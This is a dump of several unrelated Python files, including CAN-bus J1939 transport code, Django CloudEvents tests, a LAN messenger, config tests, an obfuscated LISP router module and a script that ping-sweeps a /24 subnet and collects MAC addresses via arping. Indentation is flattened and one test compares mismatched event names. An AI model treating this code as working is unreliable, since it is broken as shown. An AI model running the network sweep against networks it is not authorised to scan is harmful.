"state": ElectronicControlUnit.SendBufferState.SENDING_BM,
"deadline": time.time() + ElectronicControlUnit.Timeout.Tb,
'src_address' : src_address,
'dest_address' : pdu_specific,
'next_packet_to_send' : 0,
}
else:
# send RTS/CTS
# init new buffer for this connection
self._snd_buffer[buffer_hash] = {
"pgn": pgn.value,
"priority": priority,
"message_size": message_size,
"num_packages": num_packets,
"data": data,
"state": ElectronicControlUnit.SendBufferState.WAITING_CTS,
"deadline": time.time() + ElectronicControlUnit.Timeout.T3,
'src_address' : src_address,
'dest_address' : pdu_specific,
}
self.send_tp_rts(src_address, pdu_specific, priority, pgn.value, message_size, num_packets)
self._job_thread_wakeup()
return True
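    # Usage sketch (addresses hypothetical): nine data bytes exceed a single
    # 8-byte CAN frame, so send_pgn() opens a transport-protocol session of
    # ceil(9 / 7) = 2 packets. With pdu_specific == Address.GLOBAL (255) it
    # announces a BAM; a unicast destination gets an RTS and a wait for CTS:
    #
    #   ecu.send_pgn(0, 0xEF, 0x80, 6, 0x01, list(range(9)))  # RTS/CTS to 0x80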
class MessageListener(Listener):
"""Listens for messages on CAN bus and feeds them to an ECU instance.
:param j1939.ElectronicControlUnit ecu:
The ECU to notify on new messages.
"""
def __init__(self, ecu):
self.ecu = ecu
def on_message_received(self, msg):
if msg.is_error_frame or msg.is_remote_frame:
return
try:
self.ecu.notify(msg.arbitration_id, msg.data, msg.timestamp)
except Exception as e:
            # Exceptions in any callbacks should not affect CAN processing
logger.error(str(e))
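# A minimal wiring sketch. How the ECU acquires self._bus is outside this
# excerpt, so the constructor and subscribe calls below are assumptions; the
# Notifier hookup is plain python-can:
#
#   import can
#   bus = can.interface.Bus(bustype="virtual", channel=0)
#   ecu = ElectronicControlUnit()          # assumed constructor
#   notifier = can.Notifier(bus, [MessageListener(ecu)])
#   ecu.subscribe(print)                   # assumed: appends to ecu._subscribers
#
# MessageListener drops error and remote frames and hands everything else to
# ecu.notify(), so subscribers receive fully reassembled multi-packet PGNs.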
|
tests.py
|
import io
import json
from django.db.models.signals import pre_init, post_init, pre_save, post_save, pre_delete, post_delete
from django.test import TestCase, override_settings
from django_signals_cloudevents import send_cloudevent, default_handler
import os
from django_fake_model import models as f
from django.db import models
from http.server import BaseHTTPRequestHandler, HTTPServer
import socket
from threading import Thread
import requests
from cloudevents.sdk import marshaller
from cloudevents.sdk.converters import binary
from cloudevents.sdk.event import v1
ALLOWED_EVENT_TYPES = (
"django.orm.pre_init",
"django.orm.post_init",
"django.orm.pre_save",
"django.orm.post_save",
"django.orm.m2m_change",
"django.orm.pre_delete",
"django.orm.post_delete",
"django.orm.pre_migrate",
"django.orm.post_migrate",
)
class FakeSourceModel(f.FakeModel):
name = models.CharField(max_length=100)
enabled = models.BooleanField()
class MockServerRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
# Process an HTTP GET request and return a response with an HTTP 200 status.
self.send_response(requests.codes.ok)
self.end_headers()
return
def do_POST(self):
# Process an HTTP POST request and return a response with an HTTP 200 status.
content_len = int(self.headers.get('Content-Length'))
request_body = self.rfile.read(content_len)
m = marshaller.NewHTTPMarshaller([binary.NewBinaryHTTPCloudEventConverter()])
event = m.FromRequest(v1.Event(), self.headers, io.BytesIO(request_body), lambda x: json.load(x))
event_type = event.EventType()
assert event_type in ALLOWED_EVENT_TYPES
extensions = event.Extensions()
extensions["djangoapp"] = FakeSourceModel._meta.app_label
extensions["djangomodel"] = FakeSourceModel._meta.model_name
event_data = event.Data()
if event_type in ("django.orm.post.init", "django.orm.pre.save", "django.orm.post.save",
"django.orm.pre.delete", "django.orm.post.delete", "django.orm.m2m.change"):
assert "data" in event_data
instance_data = event_data["data"]
assert "id" in instance_data and "name" in instance_data and "enabled" in instance_data
assert event_data["db_table"] == FakeSourceModel._meta.db_table
assert event_data["test_env"] # check callback execution
check_expected_kwargs(event_type, event_data["signal_kwargs"])
self.send_response(requests.codes.ok)
self.end_headers()
return
def check_expected_kwargs(event_type, kwargs):
if event_type == "django.orm.pre_init":
assert len(kwargs) == 2 and all(k in kwargs for k in ("args", "kwargs"))
elif event_type == "django.orm.post_init":
assert len(kwargs) == 0
elif event_type == "django.orm.pre_save":
assert len(kwargs) == 3 and all(k in kwargs for k in ("update_fields", "raw", "using"))
elif event_type == "django.orm.post_save":
assert len(kwargs) == 4 and all(k in kwargs for k in ("created", "update_fields", "raw", "using"))
elif event_type in ("django.orm.pre_delete", "django.orm.post_delete"):
assert len(kwargs) == 1 and "using" in kwargs
elif event_type == "django.orm.m2m_change":
assert len(kwargs) == 5 and all(k in kwargs for k in ("action", "reverse", "model", "pk_set", "using"))
elif event_type in ("django.orm.pre_migrate", "django.orm.post_migrate"):
assert len(kwargs) == 6 and all(k in kwargs for k in ("app_config", "verbosity", "interactive", "using",
"apps", "plan"))
def get_free_port():
s = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM)
s.bind(('localhost', 0))
address, port = s.getsockname()
s.close()
return port
def test_events_handler(event):
data = event.Data()
data["test_env"] = True
event.SetData(data)
default_handler(event)
@override_settings(
CLOUDEVENTS_ENV={
"SINK_VAR": "MOCK_SINK",
"SOURCE_VAR": "TEST_SOURCE",
},
CLOUDEVENTS_HANDLER=test_events_handler
)
class SourceTestCase(TestCase):
def setUp(self):
self.mock_server_port = get_free_port()
self.mock_server = HTTPServer(('localhost', self.mock_server_port), MockServerRequestHandler)
self.mock_server_thread = Thread(target=self.mock_server.serve_forever)
        self.mock_server_thread.daemon = True
self.mock_server_thread.start()
os.environ["MOCK_SINK"] = "http://localhost:%s" % self.mock_server_port
os.environ["TEST_SOURCE"] = "test-orm-source"
pre_init.connect(send_cloudevent, sender=FakeSourceModel)
post_init.connect(send_cloudevent, sender=FakeSourceModel)
pre_save.connect(send_cloudevent, sender=FakeSourceModel)
post_save.connect(send_cloudevent, sender=FakeSourceModel)
pre_delete.connect(send_cloudevent, sender=FakeSourceModel)
post_delete.connect(send_cloudevent, sender=FakeSourceModel)
@FakeSourceModel.fake_me
def test_send_event(self):
fake_source = FakeSourceModel.objects.create(name="fake_source", enabled=True)
fake_source.enabled = False
fake_source.save()
fake_source.delete()
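# Send-side sketch for reference. Only the marshaller/converter calls mirror
# this file; the event attributes and the converters import are illustrative:
#
#   from cloudevents.sdk import converters
#
#   event = (
#       v1.Event()
#       .SetEventType("django.orm.post_save")
#       .SetSource("test-orm-source")
#       .SetEventID("0001")
#       .SetData({"db_table": FakeSourceModel._meta.db_table})
#   )
#   m = marshaller.NewHTTPMarshaller([binary.NewBinaryHTTPCloudEventConverter()])
#   headers, body = m.ToRequest(event, converters.TypeBinary, json.dumps)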
|
ping2_advanced.py
|
#! /usr/bin/env python3
# -*-coding:utf-8 -*-
# @Time : 2019/06/16 16:44:29
# @Author : che
# @Email : ch1huizong@gmail.com
# Multiple queues and thread pools; hosts that answer ping are fed into the arping queue
import re
from threading import Thread
import subprocess
from queue import Queue
num_ping_threads = 3
num_arp_threads = 3
in_queue = Queue()
out_queue = Queue()
ips = ["192.168.1.%d" % ip for ip in range(1, 255)]
def pinger(i, iq, oq):
while True:
ip = iq.get()
# print('Thread %s: Pinging %s' % (i, ip))
ret = subprocess.call(
"ping -c1 %s " % ip,
shell=True,
stdout=open("/dev/null", "w"),
stderr=subprocess.STDOUT,
)
if ret == 0:
oq.put(ip)
else:
pass
# print("%s: did not respond" % ip)
iq.task_done()
def arping(i, oq):
while True:
ip = oq.get()
p = subprocess.Popen(
"arping -I wlp3s0 -c5 %s" % ip, shell=True, stdout=subprocess.PIPE
)
out = p.stdout.read().decode()
        # Extract the MAC address from the arping output
result = out.split()
pattern = re.compile(":")
macaddr = None
for item in result:
if re.search(pattern, item):
macaddr = item
break
print("IP Address: %s | Mac Address: %s" % (ip, macaddr))
oq.task_done()
def main():
    # Create the ping thread pool
    for i in range(num_ping_threads):
        worker = Thread(target=pinger, args=(i, in_queue, out_queue))
        worker.daemon = True
        worker.start()
    # Create the arping thread pool
    for i in range(num_arp_threads):
        worker = Thread(target=arping, args=(i, out_queue))
        worker.daemon = True
        worker.start()
    # Put every target IP on the ping queue
for ip in ips:
in_queue.put(ip)
print("Main Thread Waiting")
    in_queue.join()  # the ping and arping stages hand work off through the queues
out_queue.join()
print("Done")
if __name__ == "__main__":
    main()
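# Design note: the worker threads above never exit on their own; the program
# ends because they are daemon threads and both queue.join() calls return once
# every task_done() has fired. An explicit-shutdown variant (hypothetical, not
# used here) would push one sentinel per worker instead:
#
#   SENTINEL = None
#   for _ in range(num_ping_threads):
#       in_queue.put(SENTINEL)
#   # ...and pinger() would do: if ip is SENTINEL: iq.task_done(); break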
|
test_config.py
|
import asyncio
import copy
import pytest
import random
import yaml
from shibgreen.util.config import create_default_shibgreen_config, initial_config_file, load_config, save_config
from shibgreen.util.path import mkdir
from multiprocessing import Pool, TimeoutError
from pathlib import Path
from threading import Thread
from time import sleep
from typing import Dict
# Commented-out lines are preserved to aid in debugging the multiprocessing tests
# import logging
# import os
# import threading
# log = logging.getLogger(__name__)
def write_config(root_path: Path, config: Dict):
"""
Wait for a random amount of time and write out the config data. With a large
config, we expect save_config() to require multiple writes.
"""
sleep(random.random())
# log.warning(f"[pid:{os.getpid()}:{threading.get_ident()}] write_config")
# save_config(root_path=root_path, filename="config.yaml", config_data=modified_config)
save_config(root_path=root_path, filename="config.yaml", config_data=config)
def read_and_compare_config(root_path: Path, default_config: Dict):
"""
Wait for a random amount of time, read the config and compare with the
default config data. If the config file is partially-written or corrupt,
load_config should fail or return bad data
"""
# Wait a moment. The read and write threads are delayed by a random amount
# in an attempt to interleave their execution.
sleep(random.random())
# log.warning(f"[pid:{os.getpid()}:{threading.get_ident()}] read_and_compare_config")
config: Dict = load_config(root_path=root_path, filename="config.yaml")
assert len(config) > 0
# if config != default_config:
# log.error(f"[pid:{os.getpid()}:{threading.get_ident()}] bad config: {config}")
# log.error(f"[pid:{os.getpid()}:{threading.get_ident()}] default config: {default_config}")
assert config == default_config
async def create_reader_and_writer_tasks(root_path: Path, default_config: Dict):
"""
Spin-off reader and writer threads and wait for completion
"""
thread1 = Thread(target=write_config, kwargs={"root_path": root_path, "config": default_config})
thread2 = Thread(target=read_and_compare_config, kwargs={"root_path": root_path, "default_config": default_config})
thread1.start()
thread2.start()
thread1.join()
thread2.join()
def run_reader_and_writer_tasks(root_path: Path, default_config: Dict):
"""
Subprocess entry point. This function spins-off threads to perform read/write tasks
concurrently, possibly leading to synchronization issues accessing config data.
"""
    asyncio.run(create_reader_and_writer_tasks(root_path, default_config))
class TestConfig:
@pytest.fixture(scope="function")
def root_path_populated_with_config(self, tmpdir) -> Path:
"""
Create a temp directory and populate it with a default config.yaml.
Returns the root path containing the config.
"""
root_path: Path = Path(tmpdir)
create_default_shibgreen_config(root_path)
return Path(root_path)
@pytest.fixture(scope="function")
def default_config_dict(self) -> Dict:
"""
Returns a dictionary containing the default config.yaml contents
"""
content: str = initial_config_file("config.yaml")
config: Dict = yaml.safe_load(content)
return config
def test_create_config_new(self, tmpdir):
"""
Test create_default_shibgreen_config() as in a first run scenario
"""
# When: using a clean directory
root_path: Path = Path(tmpdir)
config_file_path: Path = root_path / "config" / "config.yaml"
# Expect: config.yaml doesn't exist
assert config_file_path.exists() is False
# When: creating a new config
create_default_shibgreen_config(root_path)
# Expect: config.yaml exists
assert config_file_path.exists() is True
expected_content: str = initial_config_file("config.yaml")
assert len(expected_content) > 0
with open(config_file_path, "r") as f:
actual_content: str = f.read()
# Expect: config.yaml contents are seeded with initial contents
assert actual_content == expected_content
def test_create_config_overwrite(self, tmpdir):
"""
Test create_default_shibgreen_config() when overwriting an existing config.yaml
"""
# When: using a clean directory
root_path: Path = Path(tmpdir)
config_file_path: Path = root_path / "config" / "config.yaml"
mkdir(config_file_path.parent)
# When: config.yaml already exists with content
with open(config_file_path, "w") as f:
f.write("Some config content")
# Expect: config.yaml exists
assert config_file_path.exists() is True
# When: creating a new config
create_default_shibgreen_config(root_path)
# Expect: config.yaml exists
assert config_file_path.exists() is True
expected_content: str = initial_config_file("config.yaml")
assert len(expected_content) > 0
with open(config_file_path, "r") as f:
actual_content: str = f.read()
# Expect: config.yaml contents are overwritten with initial contents
assert actual_content == expected_content
def test_load_config(self, root_path_populated_with_config, default_config_dict):
"""
Call load_config() with a default config and verify a few values are set to the expected values
"""
root_path: Path = root_path_populated_with_config
# When: loading a newly created config
config: Dict = load_config(root_path=root_path, filename="config.yaml")
assert config is not None
# Expect: config values should match the defaults (from a small sampling)
assert config["daemon_port"] == default_config_dict["daemon_port"] == 44428
assert config["self_hostname"] == default_config_dict["self_hostname"] == "localhost"
assert (
config["farmer"]["network_overrides"]["constants"]["mainnet"]["GENESIS_CHALLENGE"]
== default_config_dict["farmer"]["network_overrides"]["constants"]["mainnet"]["GENESIS_CHALLENGE"]
== "ccd5bb71183532bff220ba46c268991a3ff07eb358e8255a65c30a2dce0e5fbb"
)
def test_load_config_exit_on_error(self, tmpdir):
"""
Call load_config() with an invalid path. Behavior should be dependent on the exit_on_error flag.
"""
root_path: Path = tmpdir
config_file_path: Path = root_path / "config" / "config.yaml"
# When: config file path points to a directory
mkdir(config_file_path)
# When: exit_on_error is True
# Expect: load_config will exit
with pytest.raises(SystemExit):
_ = load_config(root_path=root_path, filename=config_file_path, exit_on_error=True)
# When: exit_on_error is False
# Expect: load_config will raise an exception
with pytest.raises(ValueError):
_ = load_config(root_path=root_path, filename=config_file_path, exit_on_error=False)
def test_save_config(self, root_path_populated_with_config, default_config_dict):
"""
Test modifying the config and saving it to disk. The modified value(s) should be present after
calling load_config().
"""
root_path: Path = root_path_populated_with_config
config: Dict = copy.deepcopy(default_config_dict)
# When: modifying the config
config["harvester"]["farmer_peer"]["host"] = "oldmacdonald.eie.io"
# Sanity check that we didn't modify the default config
assert config["harvester"]["farmer_peer"]["host"] != default_config_dict["harvester"]["farmer_peer"]["host"]
# When: saving the modified config
save_config(root_path=root_path, filename="config.yaml", config_data=config)
# Expect: modifications should be preserved in the config read from disk
loaded: Dict = load_config(root_path=root_path, filename="config.yaml")
assert loaded["harvester"]["farmer_peer"]["host"] == "oldmacdonald.eie.io"
def test_multiple_writers(self, root_path_populated_with_config, default_config_dict):
"""
Test whether multiple readers/writers encounter data corruption. When using non-atomic operations
to write to the config, partial/incomplete writes can cause readers to yield bad/corrupt data.
        Access to config.yaml isn't currently synchronized, so the best we can hope for is that
        the file contents are written as a whole.
"""
        # Artificially inflate the size of the default config. This is done to (hopefully) force
# save_config() to require multiple writes. When save_config() was using shutil.move()
# multiple writes were observed, leading to read failures when data was partially written.
default_config_dict["xyz"] = "x" * 32768
root_path: Path = root_path_populated_with_config
save_config(root_path=root_path, filename="config.yaml", config_data=default_config_dict)
num_workers: int = 30
args = list(map(lambda _: (root_path, default_config_dict), range(num_workers)))
# Spin-off several processes (not threads) to read and write config data. If any
# read failures are detected, the failing process will assert.
with Pool(processes=num_workers) as pool:
res = pool.starmap_async(run_reader_and_writer_tasks, args)
try:
res.get(timeout=60)
except TimeoutError:
pytest.skip("Timed out waiting for reader/writer processes to complete")
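# For contrast, a writer that never exposes a partial file to readers. This is
# a sketch of the usual tempfile + os.replace pattern; whether shibgreen's
# save_config() does exactly this is an assumption drawn from the shutil.move
# comment in test_multiple_writers above.
#
#   import os
#   import tempfile
#
#   def atomic_write(path, text):
#       fd, tmp = tempfile.mkstemp(dir=os.path.dirname(path))
#       with os.fdopen(fd, "w") as f:
#           f.write(text)
#       os.replace(tmp, path)  # atomic rename: readers see old or new, never half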
|
MessengerMDApp.py
|
import os
import socket as st
import sys
from datetime import datetime
from functools import partial
from socket import socket
from threading import Thread
from typing import Any
from encryption import create_rsa_files, new_cipher
from kivy_imports import (
Builder,
Clock,
Config,
Keyboard,
ObjectProperty,
ScrollView,
Sound,
SoundLoader,
Widget,
Window,
escape_markup,
resource_add_path,
)
from kivymd.app import MDApp
from kivymd.uix.dialog import MDDialog
from kivymd.uix.list import CheckboxLeftWidget, MDList
from kivymd.uix.textfield import MDTextField
from networking import Message, MessengerSocket
from widgets import InformationItem, MessageItem, SoundItem
own_port = None
message_port = None
ip_set: set[str] = set()
class MessageInput(MDTextField):
output = ObjectProperty(MDList)
username = ObjectProperty(MDTextField)
ip_input = ObjectProperty(MDTextField)
scroll_view = ObjectProperty(ScrollView)
ip_set_for_widget = ObjectProperty(ip_set)
"""giving the kv file the set of ip_adresses"""
receiver: str
item: MessageItem
name: str
message: Message
incoming_message: Message
sound: Sound | None = None
def check_disabled(self, *args: Any, **kwargs: Any):
return (
self.ip_input.text if self.ip_input.text != "" else "127.0.0.1"
) not in ip_set
def keyboard_on_key_down(
self,
window: Keyboard,
keycode: tuple[int, str],
text: str,
modifiers: list[str],
) -> bool | None:
if keycode[1] in ["enter", "return"]:
self.send_message()
return
return super().keyboard_on_key_down(window, keycode, text, modifiers)
def insert_msg(
self, title: str, message: str, i_o: str, *args: Any, **kwargs: Any
) -> None:
if i_o == "incoming":
self.item = MessageItem(title, message, "left")
elif i_o == "outgoing":
self.item = MessageItem(title, message, "right")
self.output.add_widget(self.item)
self.scroll_view.scroll_to(self.item)
return
def send_message(self) -> None:
if not self.ip_input.error and self.ip_input.text != "":
self.receiver: str = self.ip_input.text
else:
self.receiver: str = "127.0.0.1"
if self.receiver in ip_set:
if self.text == "":
return
self.name: str = self.username.text[:9]
self.message = Message(name=self.name, msg=self.text[:1000])
esc_time: str = escape_markup(f"[{datetime.now().strftime('%H:%M')}] ")
serversocket.sendto(self.message.encoded(), (self.receiver, message_port))
if not self.name:
self.insert_msg(f"{esc_time} You:", self.text, "outgoing")
else:
self.insert_msg(
f"{esc_time} {self.name} (You):",
self.text,
"outgoing",
)
# if sound:
# sound.play()
else:
with open("pubkey.pem", "rb") as f:
with socket() as send_key_socket:
send_key_socket.bind(("", 0))
# sendkey_port = send_key_socket.getsockname()[1]
send_key_socket.connect((self.receiver, self.key_port))
send_key_socket.sendfile(f, 0)
self.disabled = False
self.text = ""
self.focus = True
self.error = False
ip_set.add(self.receiver)
return
def listen_for_key(self) -> None:
with socket() as key_socket:
key_socket.bind(("", 0))
self.key_port = key_socket.getsockname()[1]
key_socket.listen(1)
while True:
sc, address = key_socket.accept()
while data := sc.recv(1024):
print(data)
with open(f"pub-keys/{address[0]}.pem", "wb") as keyfile:
keyfile.write(data)
def listen_for_msg(self) -> None:
while True:
json_data, address = serversocket.recvfrom(1024)
if self.sound:
self.sound.play()
self.incoming_message = Message()
self.incoming_message.update_dict(json_data)
current_time = datetime.now().strftime("%H:%M")
curry_time = f"[{current_time}] "
esc_time = escape_markup(curry_time)
if self.incoming_message.name != "":
msg_title = esc_time + self.incoming_message.name
if address[0] == "127.0.0.1":
Clock.schedule_once(
partial(
self.insert_msg,
f"{msg_title} (You):",
self.incoming_message.msg,
"incoming",
)
)
else:
Clock.schedule_once(
partial(
self.insert_msg,
f"{msg_title}:",
self.incoming_message.msg,
"incoming",
)
)
elif address[0] == "127.0.0.1":
msg_title = esc_time + address[0]
Clock.schedule_once(
partial(
self.insert_msg,
f"{msg_title} (You):",
self.incoming_message.msg,
"incoming",
)
)
else:
msg_title = esc_time + address[0]
Clock.schedule_once(
partial(
self.insert_msg,
f"{msg_title}:",
self.incoming_message.msg,
"incoming",
)
)
def on_parent(self, *args: Any, **kwargs: Any) -> None:
receivethread = Thread(target=self.listen_for_msg, daemon=True)
receivethread.start()
keyrcvthread = Thread(target=self.listen_for_key, daemon=True)
keyrcvthread.start()
class MessengerWindow(MDApp):
confirmation_dialog = None
information_dialog = None
title = "Messenger"
def __init__(self, **kwargs: Any) -> None:
Window.softinput_mode = "below_target" # type: ignore
Config.set("input", "mouse", "mouse,multitouch_on_demand")
super().__init__(**kwargs)
self.theme_cls.primary_palette = "Green"
def build(self) -> None:
self.theme_cls.theme_style = "Dark"
self.icon = ""
return Builder.load_file("./messengerMD.kv")
def change_sound_and_set_icon(
self, instance_check: CheckboxLeftWidget, item: SoundItem
) -> None:
print(self.root.children[0].children[1].sound) # type: ignore
instance_check.active = True
check_list: list[Widget] = instance_check.get_widgets(instance_check.group)
for check in check_list:
if check != instance_check:
check.active = False
sound_name = item.text
if sound_name == "no sound":
self.root.children[0].children[1].sound = None # type: ignore
return
self.root.children[0].children[1].sound = SoundLoader.load(
f"sounds/{sound_name}"
) # pyright: reportUnknownMemberType=false
def show_information_dialog(self):
if not self.information_dialog:
self.information_dialog = MDDialog(
title="Port & IP Address",
type="simple",
items=[
InformationItem(text=own_ip, icon="map-marker"),
InformationItem(text=str(message_port), icon="ethernet"),
],
)
self.information_dialog.open()
def show_confirmation_dialog(self) -> None:
if not self.confirmation_dialog:
self.confirmation_dialog = MDDialog(
title="Choose sound:",
type="simple",
items=[
SoundItem(text="no sound"),
SoundItem(text="bakugo.mp3"),
SoundItem(text="jamie.mp3"),
SoundItem(text="peekaboo.mp3"),
SoundItem(text="sound.wav"),
SoundItem(text="tequila.mp3"),
],
)
self.confirmation_dialog.open()
if __name__ == "__main__":
if hasattr(sys, "_MEIPASS"):
resource_add_path(os.path.join(sys._MEIPASS)) # type: ignore
try:
os.mkdir("pubkeys")
except OSError:
pass
else:
print("folder created")
serversocket = MessengerSocket()
serversocket.bind(("", 0))
message_port = serversocket.getsockname()[1]
own_ip = st.gethostbyname(st.gethostname())
create_rsa_files()
new_aes = new_cipher()
MessengerWindow().run()
else:
print("imports not allowed")
|
lisp-rtr.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-rtr.py
#
# This file performs LISP Reencapsualting Tunnel Router (RTR) functionality.
#
# -----------------------------------------------------------------------------
import lisp
import lispconfig
import socket
import time
import select
import threading
import pcappy
import os
import copy
II1iII1i = [ None , None , None ]
oO0oIIII = None
Oo0oO0oo0oO00 = None
i111I = None
II1Ii1iI1i = lisp . lisp_get_ephemeral_port ( )
iiI1iIiI = None
OOo = None
Ii1IIii11 = None
OOo000 = [ ]
def i11IiIiiIIIII ( parameter ) :
global OOo000
return ( lispconfig . lisp_itr_rtr_show_command ( parameter , "RTR" ,
OOo000 ) )
def i1iIIIiI1I ( parameter ) :
global OOo000
return ( lispconfig . lisp_itr_rtr_show_command ( parameter , "RTR" , OOo000 ,
True ) )
def o0OOOOO00o0O0 ( parameter ) :
return ( lispconfig . lisp_show_crypto_list ( "RTR" ) )
def oO00 ( kv_pair ) :
lispconfig . lisp_database_mapping_command ( kv_pair )
def o00O ( parameter ) :
return ( lispconfig . lisp_itr_rtr_show_rloc_probe_command ( "RTR" ) )
def II1i1IiiIIi11 ( mc , parms ) :
iI1Ii11iII1 , Oo0O0O0ooO0O , IIIIii , O0o0 = parms
oO0OOoO0 = "{}:{}" . format ( Oo0O0O0ooO0O . print_address_no_iid ( ) , IIIIii )
I111Ii111 = lisp . green ( mc . print_eid_tuple ( ) , False )
i111IiI1I = "Changed '{}' translated address:port to {} for EID {}, {} {}" . format ( O0o0 , lisp . red ( oO0OOoO0 , False ) , I111Ii111 , "{}" , "{}" )
for i1 in mc . rloc_set :
if ( i1 . rle ) :
for OOO in i1 . rle . rle_nodes :
if ( OOO . rloc_name != O0o0 ) : continue
OOO . store_translated_rloc ( Oo0O0O0ooO0O , IIIIii )
Oo0oOOo = OOO . address . print_address_no_iid ( ) + ":" + str ( OOO . translated_port )
lisp . lprint ( i111IiI1I . format ( "RLE" , Oo0oOOo ) )
if ( i1 . rloc_name != O0o0 ) : continue
Oo0oOOo = i1 . rloc . print_address_no_iid ( ) + ":" + str ( i1 . translated_port )
if ( lisp . lisp_crypto_keys_by_rloc_encap . has_key ( Oo0oOOo ) ) :
o000O0o = lisp . lisp_crypto_keys_by_rloc_encap [ Oo0oOOo ]
lisp . lisp_crypto_keys_by_rloc_encap [ oO0OOoO0 ] = o000O0o
i1 . delete_from_rloc_probe_list ( mc . eid , mc . group )
i1 . store_translated_rloc ( Oo0O0O0ooO0O , IIIIii )
i1 . add_to_rloc_probe_list ( mc . eid , mc . group )
lisp . lprint ( i111IiI1I . format ( "RLOC" , Oo0oOOo ) )
if ( lisp . lisp_rloc_probing ) :
O0oOO0O = None if ( mc . group . is_null ( ) ) else mc . eid
oO = mc . eid if ( mc . group . is_null ( ) ) else mc . group
lisp . lisp_send_map_request ( iI1Ii11iII1 , 0 , O0oOO0O , oO , i1 )
lisp . lisp_write_ipc_map_cache ( True , mc )
return ( True , parms )
def i1iIIIi1i ( mc , parms ) :
if ( mc . group . is_null ( ) ) : return ( II1i1IiiIIi11 ( mc , parms ) )
if ( mc . source_cache == None ) : return ( True , parms )
mc . source_cache . walk_cache ( II1i1IiiIIi11 , parms )
return ( True , parms )
def i1I1iI1iIi111i ( sockets , hostname , rloc , port ) :
lisp . lisp_map_cache . walk_cache ( i1iIIIi1i ,
[ sockets , rloc , port , hostname ] )
return
def O0O ( lisp_packet , thread_name ) :
global II1iII1i , i1I1I , iiI1I
global iiI1iIiI , OOo
oO0OOOO0 = lisp_packet
oO0 = oO0OOOO0 . packet
O0OO0O = oO0
O0OO0O , OO , IIIIii , OoOoO = lisp . lisp_is_rloc_probe ( O0OO0O , - 1 )
if ( oO0 != O0OO0O ) :
if ( OO == None ) : return
lisp . lisp_parse_packet ( II1iII1i , O0OO0O , OO , IIIIii , OoOoO )
return
oO0OOOO0 . packet = lisp . lisp_reassemble ( oO0OOOO0 . packet )
if ( oO0OOOO0 . packet == None ) : return
if ( lisp . lisp_flow_logging ) : oO0OOOO0 = copy . deepcopy ( oO0OOOO0 )
if ( oO0OOOO0 . decode ( True , None , lisp . lisp_decap_stats ) == None ) : return
oO0OOOO0 . print_packet ( "Receive-({})" . format ( thread_name ) , True )
oO0OOOO0 . strip_outer_headers ( )
if ( oO0OOOO0 . lisp_header . get_instance_id ( ) == 0xffffff ) :
O00oO000O0O = lisp . lisp_control_header ( )
O00oO000O0O . decode ( oO0OOOO0 . packet )
if ( O00oO000O0O . is_info_request ( ) ) :
I1i1i1iii = lisp . lisp_info ( )
I1i1i1iii . decode ( oO0OOOO0 . packet )
I1i1i1iii . print_info ( )
I11ii1IIiIi = I1i1i1iii . hostname if ( I1i1i1iii . hostname != None ) else ""
OoOOo0OOoO = oO0OOOO0 . outer_source
ooO0O00Oo0o = oO0OOOO0 . udp_sport
if ( lisp . lisp_store_nat_info ( I11ii1IIiIi , OoOOo0OOoO , ooO0O00Oo0o ) ) :
i1I1iI1iIi111i ( II1iII1i , I11ii1IIiIi , OoOOo0OOoO , ooO0O00Oo0o )
else :
OO = oO0OOOO0 . outer_source . print_address_no_iid ( )
OoOoO = oO0OOOO0 . outer_ttl
oO0OOOO0 = oO0OOOO0 . packet
if ( lisp . lisp_is_rloc_probe_request ( oO0OOOO0 [ 28 ] ) == False and
lisp . lisp_is_rloc_probe_reply ( oO0OOOO0 [ 28 ] ) == False ) : OoOoO = - 1
oO0OOOO0 = oO0OOOO0 [ 28 : : ]
lisp . lisp_parse_packet ( II1iII1i , oO0OOOO0 , OO , 0 , OoOoO )
return
if ( lisp . lisp_ipc_data_plane ) :
lisp . dprint ( "Drop packet, external data-plane active" )
return
lisp . lisp_decap_stats [ "good-packets" ] . increment ( len ( oO0OOOO0 . packet ) )
if ( oO0OOOO0 . inner_dest . is_mac ( ) ) :
oO0OOOO0 . packet = lisp . lisp_mac_input ( oO0OOOO0 . packet )
if ( oO0OOOO0 . packet == None ) : return
oO0OOOO0 . encap_port = lisp . LISP_VXLAN_DATA_PORT
elif ( oO0OOOO0 . inner_version == 4 ) :
oO0OOOO0 . packet = lisp . lisp_ipv4_input ( oO0OOOO0 . packet )
if ( oO0OOOO0 . packet == None ) : return
oO0OOOO0 . inner_ttl = oO0OOOO0 . outer_ttl
elif ( oO0OOOO0 . inner_version == 6 ) :
oO0OOOO0 . packet = lisp . lisp_ipv6_input ( oO0OOOO0 )
if ( oO0OOOO0 . packet == None ) : return
oO0OOOO0 . inner_ttl = oO0OOOO0 . outer_ttl
else :
lisp . dprint ( "Cannot parse inner packet header" )
return
Ii1Iii1iIi = lisp . lisp_map_cache_lookup ( oO0OOOO0 . inner_source , oO0OOOO0 . inner_dest )
if ( Ii1Iii1iIi and ( Ii1Iii1iIi . action == lisp . LISP_NATIVE_FORWARD_ACTION or
Ii1Iii1iIi . eid . address == 0 ) ) :
III1i1i11i = lisp . lisp_db_for_lookups . lookup_cache ( oO0OOOO0 . inner_source , False )
if ( III1i1i11i and III1i1i11i . secondary_iid ) :
oOo0 = oO0OOOO0 . inner_dest
oOo0 . instance_id = III1i1i11i . secondary_iid
Ii1Iii1iIi = lisp . lisp_map_cache_lookup ( oO0OOOO0 . inner_source , oOo0 )
if ( Ii1Iii1iIi == None or Ii1Iii1iIi . action == lisp . LISP_SEND_MAP_REQUEST_ACTION ) :
if ( lisp . lisp_rate_limit_map_request ( oO0OOOO0 . inner_source ,
oO0OOOO0 . inner_dest ) ) : return
lisp . lisp_send_map_request ( II1iII1i , II1Ii1iI1i ,
oO0OOOO0 . inner_source , oO0OOOO0 . inner_dest , None )
return
if ( Ii1Iii1iIi and Ii1Iii1iIi . is_active ( ) and Ii1Iii1iIi . has_ttl_elapsed ( ) ) :
lisp . lprint ( "Refresh map-cache entry {}" . format ( lisp . green ( Ii1Iii1iIi . print_eid_tuple ( ) , False ) ) )
